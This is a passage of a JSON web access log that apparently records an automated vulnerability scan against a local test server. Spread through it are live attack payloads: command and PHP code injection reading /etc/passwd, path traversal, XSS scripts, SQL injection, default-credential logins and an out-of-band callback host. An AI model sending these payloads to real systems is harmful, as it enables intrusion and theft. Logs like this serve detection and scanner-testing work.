HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"ip=c9v8h8gsmpv8c1qg07h0u9oi46yrhywit.oast.fun:80&argu=/","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/query.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/device-id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/19 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22123456\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../297MTtUegKsMnfUvmfP5FWLfhVK.txt&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.174","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /spaces/viewdefaultdecorator.action?decoratorName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.177","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.186","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elmah.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/known_hosts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/weathermap/configs/poc.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.180","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/known_hosts.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /about/../tree?action=get HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///https://example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.DialogHandler.axd?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(297MU2hgmGAlNr1Vg0BLbHjY5k3)) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php 